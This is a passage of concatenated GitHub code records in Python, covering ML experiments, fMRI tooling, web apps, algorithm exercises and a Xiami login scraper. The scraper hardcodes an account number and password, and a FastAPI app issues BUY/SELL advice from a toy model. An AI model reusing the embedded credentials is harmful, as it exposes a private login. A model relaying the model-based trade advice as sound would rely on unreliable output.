itos[numeric[0][i+1]-3]))\n print((labels_sum, len(labels)))\n # return loss, len(numeric) * args.sequence_length\n\n\n\nimport time\n\ndevLosses = []\n#for epoch in range(10000):\nif True:\n\n \n data = AcqdivReaderPartition(acqdivCorpusReader, partition=\"train\").iterator(blankBeforeEOS=False)\n# data = data.reshuffledIterator(blankBeforeEOS=False, originalIterator=AcqdivReader.iteratorMorph)\n \n\n # training_data = corpusIteratorWiki.training(args.language)\n print(\"Got data\")\n training_chars = prepareDatasetChunks(data, train=True)\n\n\n\n rnn_drop.train(False)\n startTime = time.time()\n trainChars = 0\n counter = 0\n while True:\n counter += 1\n try:\n numeric = [next(training_chars) for _ in range(args.batchSize)]\n except StopIteration:\n break\n printHere = (counter % 50 == 0)\n forward(numeric, printHere=printHere, train=True)\n #backward(loss, printHere)\n if printHere:\n print((counter))\n print(\"Dev losses\")\n print(devLosses)\n print(\"Chars per sec \"+str(trainChars/(time.time()-startTime)))\n\n if len(labels) > 10000:\n break\n\npredictors = hidden_states\ndependent = labels\n\nfrom sklearn.model_selection import train_test_split\nx_train, x_test, y_train, y_test = train_test_split(predictors, dependent, test_size=0.1, random_state=0, shuffle=True)\n\n\nfrom sklearn.linear_model import LogisticRegression\n\nprint(\"regression\")\n\nlogisticRegr = LogisticRegression()\n\nlogisticRegr.fit(x_train, y_train)\n\npredictions = logisticRegr.predict(x_test)\n\n\nscore = logisticRegr.score(x_test, y_test)\nprint(\"Balance \",sum(y_test)/len(y_test))\nprint(score)\n\n\n\n\n\n\n# dev_data = corpusIteratorWiki.dev(args.language)\n# print(\"Got data\")\n# dev_chars = prepareDataset(dev_data, train=True) if args.language == \"italian\" else prepareDatasetChunks(dev_data, train=True)\n#\n#\n# \n# dev_loss = 0\n# dev_char_count = 0\n# counter = 0\n#\n# while True:\n# counter += 1\n# try:\n# numeric = [next(dev_chars) for _ in range(args.batchSize)]\n# except StopIteration:\n# break\n# printHere = (counter % 50 == 0)\n# loss, numberOfCharacters = forward(numeric, printHere=printHere, train=False)\n# dev_loss += numberOfCharacters * loss.cpu().data.numpy()[0]\n# dev_char_count += numberOfCharacters\n# devLosses.append(dev_loss/dev_char_count)\n# print(devLosses)\n# with open(\"/checkpoint/mhahn/\"+args.language+\"_\"+__file__+\"_\"+str(args.myID), \"w\") as outFile:\n# print(\" \".join([str(x) for x in devLosses]), file=outFile)\n#\n# if len(devLosses) > 1 and devLosses[-1] > devLosses[-2]:\n# break\n#\n","repo_name":"m-hahn/typology-char-lms","sub_path":"char-lm-acqdiv-classify-boundaries.py","file_name":"char-lm-acqdiv-classify-boundaries.py","file_ext":"py","file_size_in_byte":10225,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"20071661270","text":"import argparse\nimport json\nimport re\nfrom os import PathLike\nfrom pathlib import Path\nfrom typing import Union, List\n\nimport numpy as np\nfrom numpy.core.records import fromarrays # https://stackoverflow.com/questions/33212855/how-can-i-create-a-matlab-struct-array-from-scipy-io\nimport scipy.io\nfrom zmq import PROTOCOL_ERROR_ZMTP_MALFORMED_COMMAND_MESSAGE\nfrom multiconds import *\n\ndef create_rt_parametric_modulator_struct(reaction_time,posterror_masks,posterror_conditions):\n posterror_names = posterror_conditions['names']\n duration_array = None\n pmod_list = []\n # pmod_dict = {}\n # for k in ['name','param','poly']:\n # pmod_dict[k] = []\n \n for condition_i, condition_name in enumerate(posterror_names):\n condition_mask = posterror_masks[condition_i]\n #look up to see if we should include this regressor at all; it should\n if sum(condition_mask)>0:\n # print(str(condition_i) + \": \" + posterror_names[condition_i])\n # print(len(condition_mask))\n #condition_column = condition_mask*reaction_time\n #I'm unsure we should be mean-centering by condition here rather than across all reaction times, but it seems probably the right thing to do?\n condition_column = reaction_time[condition_mask]-np.mean(reaction_time[condition_mask])\n # print(condition_column)\n if condition_column is None:\n continue\n else:\n # print(\"duration_rray:\")\n # print(duration_array.shape)\n # print(condition_column.shape)\n #TO DO; SEE: https://stackoverflow.com/questions/19797822/creating-matlab-cell-arrays-in-python\n #THINK THAT IS THE SOLUTION.\n condition_column_npt = np.empty(1,dtype='O')\n condition_column_npt[0] = condition_column\n #condition_column_npt[0] ``= np.array([condition_column],dtype='O').T\n #condition_column_npt = np.array(np.array(condition_column).T,dtype=object)\n #rt_array = np.append(condition_column_npt, axis=1)\n\n #name_list = name_list + [posterror_names[condition_i]]\n # pmod_item = {\n # 'name':posterror_names[condition_i],\n # 'param':condition_column_npt,\n # 'poly':[]\n # }\n caps=re.findall(\"[A-Z]\",posterror_names[condition_i])\n abbreviation=\"\".join(caps).lower()\n abbreviation = abbreviation[0].upper() + abbreviation[1:]\n pmod_item = (\n abbreviation + \"RT\",\n condition_column_npt,\n [1.0]\n )\n # pmod_dict['name'] = pmod_dict['name'] + [posterror_names[condition_i]]\n # pmod_dict['param'] = pmod_dict['param'] + [condition_column]\n # pmod_dict['poly'] = pmod_dict['poly'] + [fromarrays([[]])]\n # pmod_item = [\n # posterror_names[condition_i],\n # condition_column_npt,\n # []\n # ]\n pmod_list = pmod_list + [pmod_item]\n else:\n #raise Exception(\"need to verify the next level is prepped to deal with some subjects having a missing regressor.\")\n warnings.warn(\n \"need to verify the next level is prepped to deal with some subjects having a missing regressor for condition \" + condition_name + \".\")\n\n if len(pmod_list)==0:\n return({}) #return nothing because there doesn't appear to be any params to pass\n #pmod_rec_array = fromarrays(pmod_list,names=['name','param','poly'])\n # testrec = fromarrays([['hi', 'hello'], [np.array(2),np.array(1)],[3,30.]], names=['name', 'param','poly'])\n # testrec = fromarrays([\n # ['hi', 'hello'], \n # [fromarrays([1,2]),fromarrays([1,2])]#,\n # #[fromarrays([[]]),fromarrays([[]])]\n # ], names=['name', 'param'])\n # scipy.io.savemat(\"testmat.mat\",{'var1':testrec})\n\n # testrec = fromarrays([\n # ['hi', 'hello'], \n # [([1,2]),fromarrays([1,2])]#,\n # #[fromarrays([[]]),fromarrays([[]])]\n # ], names=['name', 'param'])\n # scipy.io.savemat(\"testmat.mat\",{'var1':testrec})\n # x = np.array([('Rex', 9, [],[1,2,3]), ('Fido', 3, [],[10,20,30])],\n # dtype=[('name', '>>>>') #переделай\n#4189 К.Ю.Поляков\n'''\nАлгоритм вычисления значения функции F(n), где n – целое неотрицательное число,\nзадан следующими соотношениями:\n\nF(0) = 2\nF(n) = F(n–1), при 0 < n ≤ 15\nF(n) = 1,6*F(n–3), при 15 < n < 95\nF(n) = 3,3*F(n–2), при n ≥ 95\n\nКакая цифра встречается чаще всего в целой части значения функции F(33)? \n'''\n\ndef vol(n):\n if n == 0:\n return 2\n elif 0 < n <= 15:\n return vol(n-1)\n elif 15 < n < 95:\n return 1.6 * vol(n-3)\n elif n >= 95:\n return 3.3*vol(n-2)\nprint(vol(33))\nprint('Oтвет: 3')","repo_name":"ilyazheprog/EGE","sub_path":"Python/ЕГЭ2021/16/Решение заданий. Поляков/4189.py","file_name":"4189.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"ru","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"32217490263","text":"#pylint: disable=c0305,c0301,c0116,c0103,c0303,w0511,r0914,w0613,w0612,r1705,w0703,c0114,c0325,c0410,c0413,e0401,c0411,w0611,e0102,r1721,c0121,w0621,w0622,e0012\nfrom enum import Enum\nfrom fastapi import FastAPI\nimport re\nimport os\nimport sys\nsys.path.insert(0,\"./\")\nimport edgar_downloader, edgar_cleaner\nimport joblib\nimport ref_data as edgar_refdata\nimport text_preprocessor\nfrom sklearn.feature_extraction.text import CountVectorizer\nimport pandas as pd\n\ndf_sp100 = edgar_refdata.get_sp100()\ntickers_dict = df_sp100['Symbol']\ninput_folder = r'C:\\temp\\junk\\10k_reports_raw'\n\napp=FastAPI()\n\n@app.get(\"/\")\nasync def root():\n return {\"message\": \"Edgar api\"}\n\n@app.get(\"/html/{ticker}/{year}\")\nasync def root(ticker: str, year:str):\n tickers_list=[]\n for i in tickers_dict:\n tickers_list.append(i)\n\n if (ticker not in tickers_list):\n return{\"Error\": \"ticker not recognised\"}\n\n if int(year)> 2021 or int(year)<2000:\n return {\"ERROR\":\"invalid year\"}\n fileName = \"file not found\"\n html_files = [f for f in os.listdir(input_folder)]\n in_file_path = False\n for i in html_files:\n if ticker in i and year in i:\n in_file_path = True\n fileName = i\n if in_file_path == False:\n edgar_downloader.download_files_10k(ticker, input_folder, year)\n html_files = [f for f in os.listdir(input_folder)]\n print('------------------------------')\n for i in html_files:\n if ticker in i and year in i:\n in_file_path = True\n fileName = i\n \n localUrl = fr'C:\\temp\\junk\\10k_reports_raw\\{fileName}'\n with open(localUrl, 'r') as file:\n fileContents = file.read()\n \n return{\"message\": fileContents}\n \n\n\n@app.get(\"/sentiment/{ticker}/{year}\")\nasync def root(ticker: str, year: str):\n for f in os.listdir('downloads'):\n os.remove(os.path.join('downloads', f))\n for f in os.listdir('downloads_cleaned'):\n os.remove(os.path.join('downloads_cleaned', f))\n # Get clean 10-k filing\n edgar_downloader.download_files_10k(ticker,'downloads',year)\n\n dir='downloads'\n\n for root, dirs, files in os.walk(dir):\n for name in files:\n if year not in name:\n os.remove(os.path.join(root, name))\n\n edgar_cleaner.write_clean_html_text_files('downloads','downloads_cleaned')\n\n for root, dirs, files in os.walk('downloads_cleaned'):\n for name in files:\n text = text_preprocessor.process_text_files(os.path.join(root,name))\n #return text\n \n #Load in model\n vectorizer = joblib.load('Tfidfvectorizer.joblib')\n text = vectorizer.transform([text])\n\n model = joblib.load('model.joblib')\n movement_proba = model.predict_proba(text)\n\n if movement_proba[0][1]<0.25:\n recommendation = 'SELL'\n\n elif movement_proba[0][1]>0.75:\n recommendation = 'BUY'\n\n else:\n recommendation = 'HOLD'\n \n return{f'{ticker},{year}': \n {\"P(stonk goes up)\":movement_proba[0][1],\n \"P(stonk goes down)\":1-movement_proba[0][1],\n \"recommendation\":recommendation\n }\n }\n \n\n@app.get(\"/txt/{ticker}/{year}\")\nasync def root(ticker: str, year: str):\n return{ticker: \"text file\" + \" \" + year}\n","repo_name":"magnusgilje/ce02_ice05_kubernetes","sub_path":"K8s-Edgar/k8s-aws-demo-iceberg-lion/edgar/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18816310987","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap\n\n\nclass Perceptron(object):\n \"\"\"Perceptron classifier.\n\n Parameters\n -----------\n eta: float\n Learning rate(between 0 and 1.0)\n n_iter: int\n Loop time for learning process\n\n Attributes\n -----------\n w_: ld-array\n Weights after learning\n errors_: list\n Number of misclassifications in each epoch\n \"\"\"\n\n def __init__(self, eta=0.01, n_iter=10):\n self.eta = eta\n self.n_iter = n_iter\n self.w_ = []\n self.errors = []\n\n def fit(self, X, y):\n \"\"\"Fit training data\n :param X: Training data, shape = [n_samples, n_features]\n :param y: Target values, shape = [n_samples]\n :return: self\n \"\"\"\n self.w_ = np.zeros(X.shape[1] + 1)\n self.errors = np.zeros(self.n_iter)\n X = np.insert(X, 0, 1, 1) #Insert x0\n for i in range(self.n_iter):\n output = self.net_input(X)\n error = output - y\n update = self.eta * error\n self.w_ -= np.dot(X.T, update)\n self.errors[i] = np.dot(error, error) / 2\n return self\n\n def net_input(self, X):\n return np.dot(X, self.w_)\n\n def predict(self, X):\n X = np.insert(X, 0, 1, 1) # Insert x0\n return np.where(self.net_input(X) > 0, 1, -1)\n\n def normalize(self, X):\n X = (X-X.mean(0))/X.std(0)\n return X\n\n\ndef plot_decision_regions(X, y, classifier, resolution=0.02):\n markers = ('s', 'o', 'x', 'v')\n colors = ('red', 'blue', 'lightgreen', 'gray')\n cmap = ListedColormap(colors[:len(np.unique(y))])\n # plot the decision surface\n x1_min, x1_max = X[:, 0].min() - 1, X[:, 0].max() + 1\n x2_min, x2_max = X[:, 1].min() - 1, X[:, 1].max() + 1\n xx1, xx2 = np.meshgrid(np.arange(x1_min, x1_max, resolution),\n np.arange(x2_min, x2_max, resolution))\n Z = classifier.predict(np.array([xx1.ravel(), xx2.ravel()]).T)\n Z = Z.reshape(xx1.shape)\n plt.contourf(xx1, xx2, Z, alpha=0.4, cmap=cmap)\n plt.xlim(xx1.min(), xx1.max())\n plt.ylim(xx2.min(), xx2.max())\n \n #plot class samples\n for idx, cl in enumerate(np.unique(y)):\n filter = (y.ravel() == cl)\n plt.scatter(x=X[filter, 0], y = X[filter, 1],\n alpha = 0.4, c = 'green',\n marker = 'o', label = cl)\n\nif __name__ == \"__main__\":\n df = pd.read_csv('https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data', header=None)\n y = df.iloc[0:100, 4].values\n y = np.where(y == 'Iris-setosa', -1, 1)\n X = df.iloc[0:100, [0, 2]].values\n Classifier = Perceptron(0.001, 100)\n X_std = Classifier.normalize(X)\n plt.scatter(X_std[:50, 0], X_std[:50, 1], color='red', marker='s', label='setosa')\n plt.scatter(X_std[50:100, 0], X_std[50:100, 1], color='blue', marker='x', label='versicolor')\n plt.legend(loc='upper left')\n Classifier.fit(X_std, y)\n Z = Classifier.predict(X_std)\n plot_decision_regions(X_std, y, classifier=Classifier)\n plt.show()\n plt.plot(Classifier.errors)\n plt.show()\n","repo_name":"shaotao1988/Python-Machine-Learning","sub_path":"Linear Regression/Perceptron.py","file_name":"Perceptron.py","file_ext":"py","file_size_in_byte":3178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27533769867","text":"import re\nimport os.path\nfrom api.models import errors\nfrom api.helpers import helper\n\nocd = open(os.path.dirname(__file__) + '/../dictionaries/original_codenames_dictionary.txt', 'r', encoding='utf-8')\ncodenames_words = list(map(helper.remove_new_line_symbol, ocd.readlines()))\n\nrnd = open(os.path.dirname(__file__) + '/../dictionaries/russian_nouns_dictionary.txt', 'r', encoding='utf-8')\nrussian_words = list(map(helper.remove_new_line_symbol, rnd.readlines()))\n\n\ndef is_word_in_codenames_dictionary(target_word):\n return helper.has_item_in_sorted_list(codenames_words, target_word)\n\n\ndef is_word_in_russian_dictionary(target_word):\n return helper.has_item_in_sorted_list(russian_words, target_word)\n\n\ndef run():\n reg_exp = '[а-я` -]+'\n max_word_length = 15\n\n print('Мы начинаем! Введите слова, которые Вы бы хотели добавить в новый словарь для игры Codenames. Чтобы '\n 'закончить добавление слов, введите 0.')\n\n while True:\n try:\n test_str = input(\"Введите новое слово: \").lower().replace('ё', 'е')\n if test_str == \"0\":\n print(\"Bye!\")\n break\n elif re.fullmatch(reg_exp, test_str) is None:\n raise errors.ValueDoesNotMatchRegExpError\n elif len(test_str) > max_word_length:\n raise errors.ValueTooLong\n elif is_word_in_codenames_dictionary(test_str):\n raise errors.ValueIsInCodenamesDictionary\n elif not is_word_in_russian_dictionary(test_str):\n answer_to_add = input('Данного слова нет в словаре русских слов (существительных). Вы уверены, '\n 'что хотите добавить это слово? Введите \"да\", если согласны: ')\n if answer_to_add == \"да\":\n print('Ok, we are adding this:', test_str)\n else:\n print('Ok, we will not add this')\n else:\n print('Ok, we are adding this:', test_str)\n\n except errors.ValueDoesNotMatchRegExpError:\n print('Допустимые символы - буквы русского алфавита, дефис, пробел и апостроф. Пожалуйста, '\n 'используйте только их.')\n except errors.ValueTooLong:\n print('Длина слова не должна превышать', max_word_length, 'символов.')\n except errors.ValueIsInCodenamesDictionary:\n print('Данное слово уже есть в списке слов Codenames.')\n\n\nrun()\n","repo_name":"ktttnv/codenames-words","sub_path":"api/scripts/add_new_codenames_words.py","file_name":"add_new_codenames_words.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71911977012","text":"import requests, lxml.html\nfrom bs4 import BeautifulSoup\nimport time\n\nurl = \"https://login.xiami.com/member/login??spm=0.0.0.0.ApbFK8\"\nurl2 = \"http://www.xiami.com/artist/top/id/23282\"\n\nheaders = {\"Accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\",\n \"User-Agent\": \"Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Mobile Safari/537.36\"}\n\nparams = {\"account\": \"18011370873\", \"pw\": \"Test_123\"}\n\nsession = requests.Session()\n\n#req2 = session.get(url, headers=headers)\n#cookie = req2.cookies\n#print(req2.cookies.get_dict())\n#time.sleep(5)\n\n\nreq2 = session.get(url, headers=headers)\ntime.sleep(3)\nlogin_html = lxml.html.fromstring(req2.text)\n#print(login_html)\nhidden_inputs = login_html.xpath(r'//form//input[@type=\"hidden\"]')\nform = {x.attrib[\"name\"]: x.attrib[\"value\"] for x in hidden_inputs}\n\n\nform['account'] = \"18011370873\"\nform['pw']= \"Test_123\"\n\nprint(form)\n\nres = session.post(url, data=form)\ntime.sleep(5)\n\nprint(res.status_code)\n\n\n#soup = BeautifulSoup(req.text, \"lxml\")\n#print(soup.find(\"p\"))\n\nprint(res.url)\nprint(res.cookies.get_dict())\n","repo_name":"xieqing181/Datascraping","sub_path":"trying_xiami.py","file_name":"trying_xiami.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16553232732","text":"import math\n\ndef eval_ciclo():\n while True:\n dato = input('> ')\n if dato == 'fatto':\n break\n dato_number = int(dato)\n print(dato_number)\n ciclo_ev = eval('math.sqrt(dato_number)')\n \n print(ciclo_ev)\n print(ciclo_ev)\n \neval_ciclo()\n","repo_name":"emilianot04/Exercise_Python","sub_path":"Think-Python/capitolo_8/esercizio-extra-8.1.py","file_name":"esercizio-extra-8.1.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22328194846","text":"#https://www.hackerearth.com/practice/algorithms/graphs/topological-sort/practice-problems/algorithm/lonelyisland-49054110/\n\nimport sys\nimport math\nfrom collections import defaultdict\n\ntry: \n sys.stdin = open('input.txt', 'r') \n sys.stdout = open('output.txt', 'w')\n \nexcept: \n pass\n\nsys.setrecursionlimit(100000)\n\nclass Graph():\n def __init__(self,source):\n self.neighbours=defaultdict(list)\n self.finished=[]\n self.indegree=defaultdict(lambda:0)\n self.outdegree=defaultdict(lambda:0)\n self.probabilty=defaultdict(lambda:0)\n self.probabilty[source]=1\n\n def addEdge(self,u,v):\n self.neighbours[u].append(v)\n self.outdegree[u]+=1\n self.indegree[v]+=1\n\n def DFSVisit(self,u,visited):\n visited[u]=True\n for v in self.neighbours[u]:\n if(not visited[v]):\n self.DFSVisit(v,visited)\n self.finished.append(u)\n\n\n \n def printLonelyIsland(self):\n visited=defaultdict(lambda:False)\n finishedStack=self.finished[:]\n while finishedStack:\n u=finishedStack.pop()\n for v in self.neighbours[u]:\n self.probabilty[v]+=self.probabilty[u]*(1/self.outdegree[u])\n\n \n \n\n\nn,m,source=[int(x) for x in input().split()]\ng1=Graph(source)\nfor i in range(m):\n u,v=[int(x) for x in input().split()]\n g1.addEdge(u,v)\n \ng1.DFSVisit(source,defaultdict(lambda:False))\ng1.printLonelyIsland()\nprobabilty=g1.probabilty\nfinishedStack=g1.finished\nislands=set()\nmaxProbability=0\nfor u in finishedStack:\n if(g1.outdegree[u]==0):\n maxProbability=max(probabilty[u],maxProbability)\n islands.add(u)\n\nepsilon=10**(-9)\nfinal_answer=[]\nfor node in islands:\n diff=abs(maxProbability-probabilty[node])\n if(diff<=epsilon):\n final_answer.append(node)\n\nfinal_answer=sorted(final_answer)\nprint(*final_answer)\n\n\n","repo_name":"thecodearrow/Algorithms","sub_path":"Data Stuctures/Graphs/Lonely Island.py","file_name":"Lonely Island.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"27228866435","text":"# tests/conftest.py\n# Note: This 'conftest.py' config module is autodiscoverable by Python\n\"\"\"Package-wide text fixtures.\"\"\"\nfrom unittest.mock import Mock\n\n\nfrom _pytest.config import Config\nimport pytest\nfrom pytest_mock import MockFixture\n\n\ndef pytest_configure(config: Config) -> None:\n \"\"\"Pytest configuration hook.\"\"\"\n config.addinivalue_line(\"markers\", \"e2e: mark as end-to-end test.\")\n\n\n@pytest.fixture\ndef mock_requests_get(mocker: MockFixture) -> Mock:\n \"\"\"Fixture for mocking requests get.\"\"\"\n mock = mocker.patch(\"requests.get\")\n mock.return_value.__enter__.return_value.json.return_value = {\n \"title\": \"Wicked Wicki\",\n \"extract\": \"The Wicked Wicki whacked the whacky tricky API\",\n }\n return mock\n","repo_name":"aibistin/my-python-setup","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29111672662","text":"from node.noderegistry import NodeRegistry\nimport asyncio\n\ndef main():\n # 创建节点注册表对象\n registry = NodeRegistry(zk_hosts=\"49.52.27.50:2181\", node_path=\"/nodes\")\n\n # 启动节点注册表\n registry.start()\n\n # 注册节点\n registry.register_node(\"node1\", b\"node1_data\")\n registry.register_node(\"node2\", b\"node2_data\")\n\n # 发现节点\n nodes = registry.discover_nodes()\n print(\"Discovered nodes:\", nodes)\n\n # 注销节点\n registry.unregister_node(\"node1\")\n registry.unregister_node(\"node2\")\n\n # 停止节点注册表\n registry.stop()\n\nmain()","repo_name":"WuDi329/TranscodingQoS","sub_path":"testregistry.py","file_name":"testregistry.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"46581710974","text":"def tempo(segundos):\n h = segundos // 3600\n m = (segundos % 3600) // 60\n s = (segundos % 3600) % 60\n return h, m, s\n\ndef main():\n valor_segundos = int(input(\"Digite a quantidade de segundos que o evento durou: \"))\n h, m, s = tempo(valor_segundos)\n print(f'o evento durou {h}H:{m}M:{s}S.')\nif __name__ == '__main__':\n main()\n","repo_name":"SirLeonardoFerreira/Atividades-ifpi","sub_path":"Atividade 01 - semana 02/questão3_semana2.py","file_name":"questão3_semana2.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42425009901","text":"from flask import Flask, render_template, request, send_file, redirect, make_response, jsonify, send_from_directory\nfrom flask_dropzone import Dropzone\nfrom src import DASGIP_loader, conf, handler, simple_json_db\n \nDB = simple_json_db.SimpleJSONDB()\n \nPAGE_TITLE = \"Eppendorf DASGIP Graph Builder\"\n_DRAG_DROP_TEXT_ = \"(or) Drag and Drop files here.\"\n_VALID_TYPES_ = ['jpeg', 'png', 'jpg', 'gif']\n_VAR_COLS_ = 3\n\napp = Flask(__name__)\ndropzone = Dropzone(app)\n\ndef get_handler(filename: str):\n return handler.Handler(DB.get_content(filename), filename=filename)\n\n@app.route(\"/\")\ndef index():\n '''\n Main page - displays the drag and drop text for file.\n '''\n\n if len(DB.get_files()) == 0:\n # If no files are available, redirect to upload page.\n return redirect(\"/upload\", 302)\n else:\n # Load any file to get variables and sources.\n # kept it like this for easy changing when different file contents.\n files = DB.get_files()\n local_handler = get_handler(files[0])\n sources = local_handler.sources\n vars = local_handler.get_variables(sources[0])\n \n # Organize the variables as lines with at most _VAR_COLS_ variables per line.\n lines = [[vars[j*_VAR_COLS_ + i] for i in range(min(len(vars),_VAR_COLS_))\n if j*_VAR_COLS_ + i < len(vars)]\n for j in range(len(vars)//_VAR_COLS_ +1)]\n \n # Clear config from nulls\n config = DB.config.copy()\n for key in ('min_map', 'max_map'):\n config[key] = {k:v for k,v in config.get(key, {'': None}).items()\n if v is not None}\n\n # Create main page\n response = make_response(render_template(\"./main_page.html\",\n **vars_main,\n files=files,\n **config,\n sources=sources,\n lines=lines)) \n return response\n \n@app.get(\"/\"+conf.API_CONFIG)\ndef show_config():\n # Check persistant configuration.\n return jsonify(DB.config)\n\n@app.route(\"/\"+conf.API_CONFIG, methods=[\"POST\", \"OPTIONS\"])\ndef set_config():\n if request.method == \"OPTIONS\":\n response = options_response()\n else:\n data = request.json\n # Create the configuration parameters\n cols = []\n min_map = {}\n max_map = {}\n color_map = {}\n for key in data:\n color, min_val, max_val = data[key]\n color_map.update({key: color})\n min_map.update({key: None} if min_val == '' else {key: int(min_val)})\n max_map.update({key: None} if max_val == '' else {key: int(max_val)})\n cols.append(key)\n \n options = {\n \"color_map\":color_map,\n \"min_map\":min_map,\n \"max_map\":max_map,\n \"cols\": cols\n }\n # Update persistant configuration\n DB.config = options\n DB.commit()\n response = make_response(\"ok\")\n response.headers.add('Access-Control-Allow-Origin', \"*\")\n return response\n\n@app.get(\"/\"+conf.API_UPLOAD)\ndef upload_get():\n '''\n Uploads the file content and redirects to the selection page.\n '''\n\n return render_template(\"./upload.html\", **vars_upload)\n\n@app.post(\"/\"+conf.API_UPLOAD)\ndef upload():\n '''\n Uploads the file content and redirects to the selection page.\n '''\n\n for file in request.files.getlist('file'):\n filename = ''.join( (c for c in file.filename.split('\\\\')[-1] \\\n if c.isalnum() or c in ' -_.'))\n # Decode content, remove \\r if inserted and break into blocks per vessel\n data_blocks = DASGIP_loader.data_block_loader(\n content=file.read().decode(\"utf-8\").replace(\"\\r\",''))\n # Update database with data blocks for each file\n DB.update_content(filename, data_blocks)\n \n DB.commit()\n return redirect(\"/\", 302)\n\n@app.route(\"/\"+conf.API_GRAPH, methods=[\"POST\", \"OPTIONS\"])\ndef graph_maker():\n if request.method == \"OPTIONS\":\n response = options_response()\n else:\n options = DB.config.copy()\n cols = options.pop(\"cols\")\n data = request.json\n if data[\"files\"] == [] or data[\"sources\"] == []:\n response = jsonify({\"paths\":[\"test.png\"]})\n else:\n files_created = []\n\n for file in data[\"files\"]:\n local_handler = get_handler(file)\n local_handler.add_option(data=options)\n for source in data[\"sources\"]:\n files_created.append(\n local_handler.make_graph(source,local_handler.filter_cols(source, cols))\n )\n response = jsonify({\"paths\":files_created})\n response.headers.add('Access-Control-Allow-Origin', \"*\")\n return response\n\n@app.route(\"/\"+conf.API_LIST_FILES)\ndef list_files():\n return ';\\n'.join(DB.get_files())\n\n@app.get(\"/\"+conf.API_IMGS)\ndef list_imgs():\n return DB.get_imgs\n\n@app.route(\"/\"+conf.API_IMGS+\"\")\ndef get_img(filename: str):\n filename = filename.split(\"/\")[-1]\n if filename.split('.')[-1] not in _VALID_TYPES_:\n return conf._ERROR_IMG_\n return send_from_directory(\"../\", conf.__IMG_DIR__+filename, mimetype='image/png')\n\nwith app.app_context():\n _UPLOAD_PATH_ = conf.API_URL+conf.API_UPLOAD\n\n vars_upload = {\n \"PAGE_TITLE\": PAGE_TITLE,\n \"_DRAG_DROP_TEXT_\": _DRAG_DROP_TEXT_,\n \"_UPLOAD_PATH_\": _UPLOAD_PATH_\n }\n\n vars_main = {\n \"PAGE_TITLE\": PAGE_TITLE,\n \"_CONFIG_PATH_\": conf.API_URL+conf.API_CONFIG,\n \"_UPLOAD_PATH_\": _UPLOAD_PATH_,\n \"_IMAGES_PATH_\": conf.API_URL+conf.API_IMGS,\n \"_GRAPH_PATH_\": conf.API_URL+conf.API_GRAPH\n }\n\n\ndef options_response():\n response = make_response()\n response.headers.add(\"Access-Control-Allow-Origin\", \"*\")\n response.headers.add(\"Access-Control-Allow-Headers\", \"*\")\n response.headers.add(\"Access-Control-Allow-Methods\", \"*\")\n return response\n\nif __name__ == \"__main__\":\n app.run(debug=False, port=conf.API_PORT)\n","repo_name":"MarFerDom/DASGIPGraphBuilder","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18403377159","text":"import math\nimport unittest\n# https://yao.page/posts/kth-smallest-element-in-two-sorted-arrays-python/\n# https://www.youtube.com/watch?v=LPFhl65R7ww&t=597s\nclass Solution:\n def kthElement(self,A, B,n,m, k):\n\n lo=0\n hi = len(A) # it's \"len(A)\" and not \"len(A)-1\". the maximum number that can be chosen from the first array\n\n # more efficient\n # If *all* elements in B are in B's left ptn,\n # we'll need at least k - len(B) elements\n # in A's left ptn\n # lo = max(0, k - len(B))\n\n # If k is less than the size of A, then we\n # only need at most k elements in A's left ptn\n # hi = min(len(A), k)\n\n def get_val(arr, i): # more detail: check out the link -> https://yao.page/posts/kth-smallest-element-in-two-sorted-arrays-python/\n if 0 <= i <= len(arr) - 1:\n return arr[i]\n return math.inf * (-1 if i < 0 else 1)\n\n while lo <= hi:\n A_size = (lo + hi) // 2 # A_size indicates left size of A\n B_size = k - A_size\n\n A_left, A_right = get_val(A, A_size-1), get_val(A, A_size)\n B_left, B_right = get_val(B, B_size-1), get_val(B, B_size)\n\n if A_left <= B_right and B_left <= A_right:\n return max(A_left, B_left)\n\n elif A_left > B_right:\n hi =A_size - 1\n\n else: # B_left > A_right\n lo = A_size + 1\n\n\n\n\nclass MyTestCase(unittest.TestCase):\n def test_1(self):\n x = [1,3,5,7,9,11]\n y = [2,4,6,8,10]\n k = 6\n actual = Solution().kthElement(x,y,len(x),len(y), k)\n expected = 6\n self.assertEqual(expected, actual)\n\n\n\n\n\n\n\n\n##############################################################################\n# I've implemented kth Largest element. Geeksforgeeks question wants the kth smallest\n\n\nclass Solution:\n def kthElement(self, nums1, nums2,n,m, k):\n if len(nums1)>len(nums2):return self.kthElement(nums2, nums1,n,m, k)\n 